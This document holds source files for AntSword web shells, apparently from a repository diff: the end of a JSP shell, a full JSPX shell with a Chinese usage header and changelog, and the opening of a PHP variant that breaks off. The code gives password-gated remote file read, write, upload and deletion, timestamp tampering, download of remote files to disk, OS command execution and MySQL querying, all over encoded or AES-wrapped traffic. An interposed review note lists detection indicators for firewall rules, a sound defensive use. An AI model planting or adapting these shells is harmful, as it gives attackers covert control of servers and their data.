File sf = new File(sourceFilePath), df = new File(targetFilePath);
if (sf.isDirectory()) {
if (!df.exists()) {
df.mkdir();
}
File z[] = sf.listFiles();
for (int j = 0; j < z.length; j++) {
CopyFileOrDirCode(sourceFilePath + "/" + z[j].getName(), targetFilePath + "/" + z[j].getName());
}
} else {
FileInputStream is = new FileInputStream(sf);
FileOutputStream os = new FileOutputStream(df);
int n;
byte[] b = new byte[1024];
while ((n = is.read(b, 0, 1024)) != -1) {
os.write(b, 0, n);
}
is.close();
os.close();
}
return "1";
}
String RenameFileOrDirCode(String oldName, String newName) throws Exception {
File sf = new File(oldName), df = new File(newName);
sf.renameTo(df);
return "1";
}
String CreateDirCode(String dirPath) throws Exception {
File f = new File(dirPath);
f.mkdir();
return "1";
}
String ModifyFileOrDirTimeCode(String fileOrDirPath, String aTime) throws Exception {
File f = new File(fileOrDirPath);
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt = fm.parse(aTime);
f.setLastModified(dt.getTime());
return "1";
}
String WgetCode(String urlPath, String saveFilePath) throws Exception {
URL u = new URL(urlPath);
int n = 0;
FileOutputStream os = new FileOutputStream(saveFilePath);
HttpURLConnection h = (HttpURLConnection) u.openConnection();
InputStream is = h.getInputStream();
byte[] b = new byte[512];
while ((n = is.read(b)) != -1) {
os.write(b, 0, n);
}
os.close();
is.close();
h.disconnect();
return "1";
}
String SysInfoCode(HttpServletRequest r) throws Exception {
String d = "";
try {
if(r.getSession().getServletContext().getRealPath("/") != null){
d = r.getSession().getServletContext().getRealPath("/");
}else{
String cd = this.getClass().getResource("/").getPath();
d = new File(cd).getParent();
}
} catch (Exception e) {
String cd = this.getClass().getResource("/").getPath();
d = new File(cd).getParent();
}
d = String.valueOf(d.charAt(0)).toUpperCase() + d.substring(1);
String serverInfo = (String)System.getProperty("os.name");
String separator = File.separator;
String user = (String)System.getProperty("user.name");
String driverlist = WwwRootPathCode(d);
return d + "\t" + driverlist + "\t" + serverInfo + "\t" + user;
}
boolean isWin() {
String osname = (String)System.getProperty("os.name");
osname = osname.toLowerCase();
if (osname.startsWith("win"))
return true;
return false;
}
String ExecuteCommandCode(String cmdPath, String command) throws Exception {
StringBuffer sb = new StringBuffer("");
String[] c = { cmdPath, !isWin() ? "-c" : "/c", command };
Process p = Runtime.getRuntime().exec(c);
CopyInputStream(p.getInputStream(), sb);
CopyInputStream(p.getErrorStream(), sb);
return sb.toString();
}
String getEncoding(String str) {
String encode[] = new String[]{
"UTF-8",
"ISO-8859-1",
"GB2312",
"GBK",
"GB18030",
"Big5",
"Unicode",
"ASCII"
};
for (int i = 0; i < encode.length; i++){
try {
if (str.equals(new String(str.getBytes(encode[i]), encode[i]))) {
return encode[i];
}
} catch (Exception ex) {
}
}
return "";
}
String strtohexstr(String fileContext)throws Exception{
String h = "0123456789ABCDEF";
byte[] bytes = fileContext.getBytes(cs);
StringBuilder sb = new StringBuilder(bytes.length * 2);
for (int i = 0; i < bytes.length; i++) {
sb.append(h.charAt((bytes[i] & 0xf0) >> 4));
sb.append(h.charAt((bytes[i] & 0x0f) >> 0));
}
String fileHexContext = sb.toString();
return fileHexContext;
}
String asenc(String str, String decode) throws Exception{
if(decode.equals("hex") || decode=="hex"){
return strtohexstr(str);
}else if(decode.equals("base64") || decode == "base64"){
String sb = "";
sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder();
sb = encoder.encode(str.getBytes());
return sb;
}else if(decode.equals("hex_base64") || decode == "hex_base64"){
return asenc(asenc(str, "base64"), "hex");
}else if(decode.equals("aes_base64") || decode == "aes_base64"){
String sb1 = "";
sb1 = AesEncrypt(AesKey, asenc(str, "base64"));
return sb1.replace("\r\n","");
}
return str;
}
String decode(String str) {
byte[] bt = null;
try {
sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
bt = decoder.decodeBuffer(str);
} catch (IOException e) {
e.printStackTrace();
}
return new String(bt);
}
String decode(String str, String encode) throws Exception{
if(encode.equals("hex") || encode=="hex"){
if(str=="null"||str.equals("null")){
return "";
}
String hexString = "0123456789ABCDEF";
str = str.toUpperCase();
ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length()/2);
String ss = "";
for (int i = 0; i < str.length(); i += 2){
ss = ss + (hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))) + ",";
baos.write((hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))));
}
return baos.toString(cs);
}else if(encode.equals("base64") || encode == "base64"){
byte[] bt = null;
sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
bt = decoder.decodeBuffer(str);
return new String(bt,cs);
}else if(encode.equals("aes") || encode == "aes") {
String str1 = AesDecrypt(AesKey, str);
return str1.trim();
}
return str;
}
String AesEncrypt(String key, String cleartext) throws Exception {
IvParameterSpec zeroIv = new IvParameterSpec(key.getBytes());
SecretKeySpec keys = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance(new String("AES/"+aes_mode+"/"+aes_padding));
cipher.init(Cipher.ENCRYPT_MODE, keys, zeroIv);
byte[] encryptedData = cipher.doFinal(cleartext.getBytes("UTF-8"));
sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder();
String sb = encoder.encode(encryptedData);
return sb;
}
String AesDecrypt(String key ,String encrypted) throws Exception {
sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
byte[] byteMi = decoder.decodeBuffer(encrypted);
IvParameterSpec zeroIv = new IvParameterSpec(key.getBytes());
SecretKeySpec keys = new SecretKeySpec(key.getBytes("UTF-8"), "AES");
Cipher cipher = Cipher.getInstance(new String("AES/"+aes_mode+"/"+aes_padding));
cipher.init(Cipher.DECRYPT_MODE, keys, zeroIv);
byte[] decryptedData = cipher.doFinal(byteMi);
return new String(decryptedData, "UTF-8");
}
String getKeyFromCookie(Cookie[] cookies){
String key = "";
StringBuilder result = new StringBuilder();
if( cookies != null ){
for (Cookie c : cookies) {
if (c.getName().equals(SessionKey)) {
key = c.getValue();
break;
}
}
}
if(key.length() < aes_keylen){
for(int i=0;key.length() < aes_keylen;i++){
key += aes_key_padding;
}
}if(key.length() > aes_keylen){
key = key.substring(0,aes_keylen);
}
return key;
}
void CopyInputStream(InputStream is, StringBuffer sb) throws Exception {
String l;
BufferedReader br = new BufferedReader(new InputStreamReader(is, cs));
while ((l = br.readLine()) != null) {
sb.append(l + "\r\n");
}
br.close();
}%>
<%
response.setContentType("text/html");
request.setCharacterEncoding(cs);
response.setCharacterEncoding(cs);
StringBuffer output = new StringBuffer("");
StringBuffer sb = new StringBuffer("");
Cookie cookie = new Cookie(SessionKey, session.getId());
response.addCookie(cookie);
try {
AesKey = getKeyFromCookie(request.getCookies());
String funccode = EC(request.getParameter(Pwd) + "");
String z0 = EC(decode(request.getParameter("z0")+"", encoder));
String z1 = EC(decode(request.getParameter("z1")+"", encoder));
String z2 = EC(decode(request.getParameter("z2")+"", encoder));
String z3 = EC(decode(request.getParameter("z3")+"", encoder));
String[] pars = { z0, z1, z2, z3};
output.append(decode(RetS,"base64"));
if (funccode.equals("B")) {
sb.append(FileTreeCode(pars[1]));
} else if (funccode.equals("C")) {
sb.append(ReadFileCode(pars[1]));
} else if (funccode.equals("D")) {
sb.append(WriteFileCode(pars[1], pars[2]));
} else if (funccode.equals("E")) {
sb.append(DeleteFileOrDirCode(pars[1]));
} else if (funccode.equals("F")) {
DownloadFileCode(pars[1], response);
} else if (funccode.equals("U")) {
sb.append(UploadFileCode(pars[1], pars[2]));
} else if (funccode.equals("H")) {
sb.append(CopyFileOrDirCode(pars[1], pars[2]));
} else if (funccode.equals("I")) {
sb.append(RenameFileOrDirCode(pars[1], pars[2]));
} else if (funccode.equals("J")) {
sb.append(CreateDirCode(pars[1]));
} else if (funccode.equals("K")) {
sb.append(ModifyFileOrDirTimeCode(pars[1], pars[2]));
} else if (funccode.equals("L")) {
sb.append(WgetCode(pars[1], pars[2]));
} else if (funccode.equals("M")) {
sb.append(ExecuteCommandCode(pars[1], pars[2]));
} else if (funccode.equals("N")) {
sb.append(showDatabases(pars[0], pars[1]));
} else if (funccode.equals("O")) {
sb.append(showTables(pars[0], pars[1], pars[2]));
} else if (funccode.equals("P")) {
sb.append(showColumns(pars[0], pars[1], pars[2], pars[3]));
} else if (funccode.equals("Q")) {
sb.append(query(pars[0], pars[1], pars[2]));
} else if (funccode.equals("A")) {
sb.append(SysInfoCode(request));
}else{
sb.append(Version);
}
} catch (Exception e) {
sb.append("ERROR" + ":// " + e.toString());
}
try {
output.append(asenc(sb.toString(), decoder));
}catch (Exception e) {
sb.append("ERROR" + ":// " + e.toString());
}
output.append(decode(RetE, "base64"));
out.print(output.toString());
%>


@@ -0,0 +1,570 @@
<!--
_ ____ _
__ _ _ __ | |_/ ___|_ _____ _ __ __| |
/ _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
| (_| | | | | |_ ___) \ V V / (_) | | | (_| |
\__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
———————————————————————————————————————————————
AntSword JSPX Custom Script for Mysql
警告:
此脚本仅供合法的渗透测试以及爱好者参考学习
请勿用于非法用途,否则将追究其相关责任!
———————————————————————————————————————————————
说明:
1. AntSword >= v2.1.0
2. 创建 Shell 时选择 custom 模式连接
3. 数据库连接:
com.mysql.jdbc.Driver
jdbc:mysql://localhost/test?user=root&password=123456
注意:以上是两行
4. 本脚本中 encoder/decoder 与 AntSword 添加 Shell 时选择的 encoder/decoder 要一致,如果选择 default 则需要将值设置为空
ChangeLog:
v1.8
1. 修复由于decode函数与EC函数位置写反而导致的乱码问题
v1.7
1. 新增 AES 编码/解码 支持 (thx @Ch1ngg)
2. 新增 Version, 直接访问不带任何参数会返回当前 shell 的版本号
v1.6
1. 新增 4 种解码器支持
v1.5
1. 修正 base64 编码器下连接数据库 characterEncoding 出错
v1.4
1. 修正 windows 下基础路径获取盘符会出现小写的情况
v1.3
1. 修正上传文件超过1M时的bug
2. 修正weblogic war 包布署获取路径问题
3. 修正文件中文字符问题
Date: 2016/04/29 v1.2
1. 修正修改包含结束tag的文件会出错的 bug
Date: 2016/04/06 v1.1
1. 修正下载文件参数设置错误
2. 修正一些注释的细节
Date: 2016/03/26 v1
1. 文件系统 和 terminal 管理
2. mysql 数据库支持
3. 支持 base64 和 hex 编码
-->
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml" xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" />
<jsp:directive.page import="java.io.*"/>
<jsp:directive.page import="java.util.*"/>
<jsp:directive.page import="java.net.*"/>
<jsp:directive.page import="java.sql.*"/>
<jsp:directive.page import="java.text.*"/>
<jsp:directive.page import="javax.crypto.*"/>
<jsp:directive.page import="java.security.*"/>
<jsp:directive.page import="javax.crypto.spec.*"/>
<jsp:declaration>
<![CDATA[
// ################################################
String Pwd = "ant"; //连接密码
// 编码器 3 选 1
String encoder = ""; // default
// String encoder = "base64"; //base64
// String encoder = "hex"; //hex(推荐)
// String encoder = "aes"; // aes(加密方式见下文aes配置)
String cs = "UTF-8"; // 字符编码
// 解码器 4 选 1
String decoder = "";
// String decoder = "base64"; // base64 中文正常
// String decoder = "hex"; // hex 中文可能有问题
// String decoder = "hex_base64"; // hex(base64) // 中文正常
// String decoder = "aes_base64"; // aes(base64) (加密方式见下文aes配置)
// 其它配置
String SessionKey = "CUSTOMSESSID"; // 自定义sessionkey id
String RetS = "LT58"; // 数据起始分割符 base64
String RetE = "fDwt"; // 数据结束分割符 base64
// aes 加密配置项
/*
* aes-128-cfb_zero_padding:
* - aes_mode: CFB
* - aes_padding: NoPadding
* - aes_keylen: 16
* aes-256-ecb_zero_padding:
* - aes_mode: ECB
* - aes_padding: NoPadding
* - aes_keylen: 32
*/
// 注意: 以下4项为 encoder/decoder 共用
// 如果需要请求和返回采用不同方式, 自行修改
String aes_mode = "CFB"; // CBC|ECB|CFB|
String aes_padding = "NoPadding"; // NoPadding|PKCS5Padding|PKCS7Padding
int aes_keylen = 16; // 16|32 // 16(AES-128) 32(AES-256)
String aes_key_padding = "a"; // 获取到的 key 位数不够时填充字符
// ################################################################
String AesKey = "";
String Version = "1.7";
String EC(String s) throws Exception {
if(encoder.equals("hex") || encoder == "hex") return s;
return new String(s.getBytes(), cs);
}
String showDatabases(String encode, String conn) throws Exception {
String sql = "show databases";
String columnsep = "\t";
String rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
String showTables(String encode, String conn, String dbname) throws Exception {
String sql = "show tables from " + dbname;
String columnsep = "\t";
String rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
String showColumns(String encode, String conn, String dbname, String table) throws Exception {
String columnsep = "\t";
String rowsep = "";
String sql = "select * from " + dbname + "." + table + " limit 0,0";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
String query(String encode, String conn, String sql) throws Exception {
String columnsep = "\t|\t";
String rowsep = "\r\n";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
throws Exception {
String ret = "";
conn = (EC(conn));
String[] x = conn.trim().replace("\r\n", "\n").split("\n");
Class.forName(x[0].trim());
String url = x[1] + "&characterEncoding=" + decode(EC(encode),encoder);
Connection c = DriverManager.getConnection(url);
Statement stmt = c.createStatement();
ResultSet rs = stmt.executeQuery(sql);
ResultSetMetaData rsmd = rs.getMetaData();
if (needcoluname) {
for (int i = 1; i <= rsmd.getColumnCount(); i++) {
String columnName = rsmd.getColumnName(i);
ret += columnName + columnsep;
}
ret += rowsep;
}
while (rs.next()) {
for (int i = 1; i <= rsmd.getColumnCount(); i++) {
String columnValue = rs.getString(i);
ret += columnValue + columnsep;
}
ret += rowsep;
}
return ret;
}
String WwwRootPathCode(String d) throws Exception {
String s = "";
if (!d.substring(0, 1).equals("/")) {
File[] roots = File.listRoots();
for (int i = 0; i < roots.length; i++) {
s += roots[i].toString().substring(0, 2) + "";
}
} else {
s += "/";
}
return s;
}
String FileTreeCode(String dirPath) throws Exception {
File oF = new File(dirPath), l[] = oF.listFiles();
String s = "", sT, sQ, sF = "";
java.util.Date dt;
String fileCode=(String)System.getProperties().get("file.encoding");
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
for (int i = 0; i < l.length; i++) {
dt = new java.util.Date(l[i].lastModified());
sT = fm.format(dt);
sQ = l[i].canRead() ? "R" : "";
sQ += l[i].canWrite() ? " W" : "";
String nm = new String(l[i].getName().getBytes(fileCode), cs);
if (l[i].isDirectory()) {
s += nm + "/\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
} else {
sF += nm + "\t" + sT + "\t" + l[i].length() + "\t" + sQ + "\n";
}
}
s += sF;
return new String(s.getBytes(fileCode), cs);
}
String ReadFileCode(String filePath) throws Exception {
String l = "", s = "";
BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(filePath)), cs));
while ((l = br.readLine()) != null) {
s += l + "\r\n";
}
br.close();
return s;
}
String WriteFileCode(String filePath, String fileContext) throws Exception {
String h = "0123456789ABCDEF";
String fileHexContext = strtohexstr(fileContext);
File f = new File(filePath);
FileOutputStream os = new FileOutputStream(f);
for (int i = 0; i < fileHexContext.length(); i += 2) {
os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1))));
}
os.close();
return "1";
}
String DeleteFileOrDirCode(String fileOrDirPath) throws Exception {
File f = new File(fileOrDirPath);
if (f.isDirectory()) {
File x[] = f.listFiles();
for (int k = 0; k < x.length; k++) {
if (!x[k].delete()) {
DeleteFileOrDirCode(x[k].getPath());
}
}
}
f.delete();
return "1";
}
void DownloadFileCode(String filePath, HttpServletResponse r) throws Exception {
int n;
byte[] b = new byte[512];
r.reset();
ServletOutputStream os = r.getOutputStream();
BufferedInputStream is = new BufferedInputStream(new FileInputStream(filePath));
os.write(("->"+"|").getBytes(), 0, 3);
while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);
}
os.write(("|"+"<-").getBytes(), 0, 3);
os.close();
is.close();
}
String UploadFileCode(String savefilePath, String fileHexContext) throws Exception {
String h = "0123456789ABCDEF";
File f = new File(savefilePath);
f.createNewFile();
FileOutputStream os = new FileOutputStream(f,true);
for (int i = 0; i < fileHexContext.length(); i += 2) {
os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1))));
}
os.close();
return "1";
}
String CopyFileOrDirCode(String sourceFilePath, String targetFilePath) throws Exception {
File sf = new File(sourceFilePath), df = new File(targetFilePath);
if (sf.isDirectory()) {
if (!df.exists()) {
df.mkdir();
}
File z[] = sf.listFiles();
for (int j = 0; j < z.length; j++) {
CopyFileOrDirCode(sourceFilePath + "/" + z[j].getName(), targetFilePath + "/" + z[j].getName());
}
} else {
FileInputStream is = new FileInputStream(sf);
FileOutputStream os = new FileOutputStream(df);
int n;
byte[] b = new byte[1024];
while ((n = is.read(b, 0, 1024)) != -1) {
os.write(b, 0, n);
}
is.close();
os.close();
}
return "1";
}
String RenameFileOrDirCode(String oldName, String newName) throws Exception {
File sf = new File(oldName), df = new File(newName);
sf.renameTo(df);
return "1";
}
String CreateDirCode(String dirPath) throws Exception {
File f = new File(dirPath);
f.mkdir();
return "1";
}
String ModifyFileOrDirTimeCode(String fileOrDirPath, String aTime) throws Exception {
File f = new File(fileOrDirPath);
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt = fm.parse(aTime);
f.setLastModified(dt.getTime());
return "1";
}
String WgetCode(String urlPath, String saveFilePath) throws Exception {
URL u = new URL(urlPath);
int n = 0;
FileOutputStream os = new FileOutputStream(saveFilePath);
HttpURLConnection h = (HttpURLConnection) u.openConnection();
InputStream is = h.getInputStream();
byte[] b = new byte[512];
while ((n = is.read(b)) != -1) {
os.write(b, 0, n);
}
os.close();
is.close();
h.disconnect();
return "1";
}
String SysInfoCode(HttpServletRequest r) throws Exception {
String d = "";
try {
if(r.getSession().getServletContext().getRealPath("/") != null){
d = r.getSession().getServletContext().getRealPath("/");
}else{
String cd = this.getClass().getResource("/").getPath();
d = new File(cd).getParent();
}
} catch (Exception e) {
String cd = this.getClass().getResource("/").getPath();
d = new File(cd).getParent();
}
d = String.valueOf(d.charAt(0)).toUpperCase() + d.substring(1);
String serverInfo = (String)System.getProperty("os.name");
String separator = File.separator;
String user = (String)System.getProperty("user.name");
String driverlist = WwwRootPathCode(d);
return d + "\t" + driverlist + "\t" + serverInfo + "\t" + user;
}
boolean isWin() {
String osname = (String)System.getProperty("os.name");
osname = osname.toLowerCase();
if (osname.startsWith("win"))
return true;
return false;
}
String ExecuteCommandCode(String cmdPath, String command) throws Exception {
StringBuffer sb = new StringBuffer("");
String[] c = { cmdPath, !isWin() ? "-c" : "/c", command };
Process p = Runtime.getRuntime().exec(c);
CopyInputStream(p.getInputStream(), sb);
CopyInputStream(p.getErrorStream(), sb);
return sb.toString();
}
String getEncoding(String str) {
String encode[] = new String[]{
"UTF-8",
"ISO-8859-1",
"GB2312",
"GBK",
"GB18030",
"Big5",
"Unicode",
"ASCII"
};
for (int i = 0; i < encode.length; i++){
try {
if (str.equals(new String(str.getBytes(encode[i]), encode[i]))) {
return encode[i];
}
} catch (Exception ex) {
}
}
return "";
}
String strtohexstr(String fileContext)throws Exception{
String h = "0123456789ABCDEF";
byte[] bytes = fileContext.getBytes(cs);
StringBuilder sb = new StringBuilder(bytes.length * 2);
for (int i = 0; i < bytes.length; i++) {
sb.append(h.charAt((bytes[i] & 0xf0) >> 4));
sb.append(h.charAt((bytes[i] & 0x0f) >> 0));
}
String fileHexContext = sb.toString();
return fileHexContext;
}
String asenc(String str, String decode){
if(decode.equals("hex") || decode=="hex"){
return strtohexstr(str);
}else if(decode.equals("base64") || decode == "base64"){
String sb = "";
sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder();
sb = encoder.encode(str.getBytes());
return sb;
}else if(decode.equals("hex_base64") || decode == "hex_base64"){
return asenc(asenc(str, "base64"), "hex");
}else if(decode.equals("aes_base64") || decode == "aes_base64"){
String sb1 = "";
sb1 = AesEncrypt(AesKey, asenc(str, "base64"));
return sb1.replace("\r\n","");
}
return str;
}
String decode(String str) {
byte[] bt = null;
try {
sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
bt = decoder.decodeBuffer(str);
} catch (IOException e) {
e.printStackTrace();
}
return new String(bt);
}
String decode(String str, String encode) throws Exception{
if(encode.equals("hex") || encode=="hex"){
if(str=="null"||str.equals("null")){
return "";
}
String hexString = "0123456789ABCDEF";
str = str.toUpperCase();
ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length()/2);
String ss = "";
for (int i = 0; i < str.length(); i += 2){
ss = ss + (hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))) + ",";
baos.write((hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))));
}
return baos.toString(cs);
}else if(encode.equals("base64") || encode == "base64"){
byte[] bt = null;
sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
bt = decoder.decodeBuffer(str);
return new String(bt,cs);
}else if(encode.equals("aes") || encode == "aes") {
String str1 = AesDecrypt(AesKey, str);
return str1.trim();
}
return str;
}
String AesEncrypt(String key, String cleartext) throws Exception {
IvParameterSpec zeroIv = new IvParameterSpec(key.getBytes());
SecretKeySpec keys = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance(new String("AES/"+aes_mode+"/"+aes_padding));
cipher.init(Cipher.ENCRYPT_MODE, keys, zeroIv);
byte[] encryptedData = cipher.doFinal(cleartext.getBytes("UTF-8"));
sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder();
String sb = encoder.encode(encryptedData);
return sb;
}
String AesDecrypt(String key ,String encrypted) throws Exception {
sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
byte[] byteMi = decoder.decodeBuffer(encrypted);
IvParameterSpec zeroIv = new IvParameterSpec(key.getBytes());
SecretKeySpec keys = new SecretKeySpec(key.getBytes("UTF-8"), "AES");
Cipher cipher = Cipher.getInstance(new String("AES/"+aes_mode+"/"+aes_padding));
cipher.init(Cipher.DECRYPT_MODE, keys, zeroIv);
byte[] decryptedData = cipher.doFinal(byteMi);
return new String(decryptedData, "UTF-8");
}
String getKeyFromCookie(Cookie[] cookies){
String key = "";
StringBuilder result = new StringBuilder();
if( cookies != null ){
for (Cookie c : cookies) {
if (c.getName().equals(SessionKey)) {
key = c.getValue();
break;
}
}
}
if(key.length() < aes_keylen){
for(int i=0;key.length() < aes_keylen;i++){
key += aes_key_padding;
}
}if(key.length() > aes_keylen){
key = key.substring(0,aes_keylen);
}
return key;
}
void CopyInputStream(InputStream is, StringBuffer sb) throws Exception {
String l;
BufferedReader br = new BufferedReader(new InputStreamReader(is, cs));
while ((l = br.readLine()) != null) {
sb.append(l + "\r\n");
}
br.close();
}
]]>
</jsp:declaration>
<jsp:scriptlet>
<![CDATA[
response.setContentType("text/html");
request.setCharacterEncoding(cs);
response.setCharacterEncoding(cs);
StringBuffer output = new StringBuffer("");
StringBuffer sb = new StringBuffer("");
Cookie cookie = new Cookie(SessionKey, session.getId());
response.addCookie(cookie);
try {
AesKey = getKeyFromCookie(request.getCookies());
String funccode = EC(request.getParameter(Pwd) + "");
String z0 = EC(decode(request.getParameter("z0")+"", encoder));
String z1 = EC(decode(request.getParameter("z1")+"", encoder));
String z2 = EC(decode(request.getParameter("z2")+"", encoder));
String z3 = EC(decode(request.getParameter("z3")+"", encoder));
String[] pars = { z0, z1, z2, z3};
output.append(decode(RetS,"base64"));
if (funccode.equals("B")) {
sb.append(FileTreeCode(pars[1]));
} else if (funccode.equals("C")) {
sb.append(ReadFileCode(pars[1]));
} else if (funccode.equals("D")) {
sb.append(WriteFileCode(pars[1], pars[2]));
} else if (funccode.equals("E")) {
sb.append(DeleteFileOrDirCode(pars[1]));
} else if (funccode.equals("F")) {
DownloadFileCode(pars[1], response);
} else if (funccode.equals("U")) {
sb.append(UploadFileCode(pars[1], pars[2]));
} else if (funccode.equals("H")) {
sb.append(CopyFileOrDirCode(pars[1], pars[2]));
} else if (funccode.equals("I")) {
sb.append(RenameFileOrDirCode(pars[1], pars[2]));
} else if (funccode.equals("J")) {
sb.append(CreateDirCode(pars[1]));
} else if (funccode.equals("K")) {
sb.append(ModifyFileOrDirTimeCode(pars[1], pars[2]));
} else if (funccode.equals("L")) {
sb.append(WgetCode(pars[1], pars[2]));
} else if (funccode.equals("M")) {
sb.append(ExecuteCommandCode(pars[1], pars[2]));
} else if (funccode.equals("N")) {
sb.append(showDatabases(pars[0], pars[1]));
} else if (funccode.equals("O")) {
sb.append(showTables(pars[0], pars[1], pars[2]));
} else if (funccode.equals("P")) {
sb.append(showColumns(pars[0], pars[1], pars[2], pars[3]));
} else if (funccode.equals("Q")) {
sb.append(query(pars[0], pars[1], pars[2]));
} else if (funccode.equals("A")) {
sb.append(SysInfoCode(request));
}else{
sb.append(Version);
}
} catch (Exception e) {
sb.append("ERROR" + "://" + e.toString());
}
try {
output.append(asenc(sb.toString(), decoder));
}catch (Exception e) {
sb.append("ERROR" + ":// " + e.toString());
}
output.append(decode(RetE, "base64"));
out.print(output.toString());
]]>
</jsp:scriptlet>
</jsp:root>
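Review bot: `String Version = "1.7";` in the declaration block disagrees with the ChangeLog in the header comment, whose newest entry is v1.8 (the decode/EC ordering fix), so the no-parameter probe that returns `Version` reports a stale number; either bump it to `String Version = "1.8";` or drop the v1.8 entry. For a reader using this sample to build detections, the observable behaviour is fixed in constants rather than configuration: every reply is framed by the decoded `RetS`/`RetE` values (`LT58` is `->|`, `fDwt` is `|<-`), a `CUSTOMSESSID` cookie carrying the container session id is added on every hit before the `Pwd` parameter is read, and the dispatcher always reads `z0`–`z3` next to it. Those names, the two framing strings and the single-letter opcodes in the `funccode` chain are the stable indicators for a WAF or access-log rule. Note that the `F` branch calls `response.reset()` and streams the raw file between the same `->|`/`|<-` markers without passing through `asenc`, so download replies are never hex/base64/AES-wrapped even when a decoder is configured.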


@@ -0,0 +1,461 @@
<?php
/**
* _ ____ _
* __ _ _ __ | |_/ ___|_ _____ _ __ __| |
* / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
* | (_| | | | | |_ ___) \ V V / (_) | | | (_| |
* \__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
* ———————————————————————————————————————————————
* AntSword PHP Custom Script for Mysql
*
* 警告:
* 此脚本仅供合法的渗透测试以及爱好者参考学习
* 请勿用于非法用途,否则将追究其相关责任!
* ———————————————————————————————————————————————
*
* 使用说明:
* 1. AntSword >= v2.0.7
* 2. 创建 Shell 时选择 custom 模式连接
* 3. 数据库连接:
* <H>localhost</H>
* <U>root</U>
* <P>123456</P>
*
* 4. 本脚本中 encoder 与 AntSword 添加 Shell 时选择的 encoder 要一致,如果选择 default 则需要将 encoder 值设置为空
*
* ChangeLog:
* Date: 2020/03/26 v1.4
* 1. 修复由于decode函数与EC函数位置写反而导致的乱码问题
* 2. 增加动态修改字符编码接口
*
* Date: 2019/05/22 v1.3
* 1. 支持 mysqli 连接非默认端口
*
* Date: 2019/04/05 v1.2
* 1. 新增 listcmd 接口
* 2. 新增数据库支持函数检查接口
*
* Date: 2016/05/13 v1.1
* 1. 执行 DML 语句,显示执行状态
*
* Date: 2016/04/06 v1.0
* 1. 文件系统 和 terminal 管理
* 2. mysql 数据库支持
* 3. 支持 base64 和 hex 编码
**/
$pwd = "ant"; //连接密码
//数据编码 3 选 1
$encoder = ""; // default
// $encoder = "base64"; //base64
// $encoder = "hex"; // hex
//$cs = "UTF-8";
$cs=isset($_REQUEST['charset'])?$_REQUEST['charset']:"UTF-8";
/**
* 字符编码处理
**/
function EC($s){
global $cs;
$sencode = mb_detect_encoding($s, array("ASCII","UTF-8","GB2312","GBK",'BIG5'));
$ret = "";
try {
$ret = mb_convert_encoding($s, $cs, $sencode);
} catch (Exception $e) {
try {
$ret = iconv($sencode, $cs, $s);
} catch (Exception $e) {
$ret = $s;
}
}
return $ret;
}
/*传输解码*/
function decode($s){
global $encoder;
$ret = "";
switch ($encoder) {
case 'base64':
$ret = base64_decode($s);
break;
case 'hex':
for ($i=0; $i < strlen($s)-1; $i+=2) {
$output = substr($s, $i, 2);
$decimal = intval($output, 16);
$ret .= chr($decimal);
}
break;
default:
$ret = $s;
break;
}
return $ret;
}
function showDatabases($encode, $conf){
$sql = "show databases";
$columnsep = "\t";
$rowsep = "";
return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, false);
}
function showTables($encode, $conf, $dbname){
$sql = "show tables from ".$dbname; // mysql
$columnsep = "\t";
$rowsep = "";
return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, false);
}
function showColumns($encode, $conf, $dbname, $table){
$columnsep = "\t";
$rowsep = "";
$sql = "select * from ".$dbname.".".$table." limit 0,0"; // mysql
return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, true);
}
function query($encode, $conf, $sql){
$columnsep = "\t|\t"; // general
$rowsep = "\r\n";
return executeSQL($encode, $conf, $sql, $columnsep, $rowsep, true);
}
function executeSQL($encode, $conf, $sql, $columnsep, $rowsep, $needcoluname){
$ret = "";
$m=get_magic_quotes_gpc();
if ($m) {
$conf = stripslashes($conf);
}
$conf = (EC($conf));
/*
<H>localhost</H>
<U>root</U>
<P>root</P>
*/
$host="";
$user="";
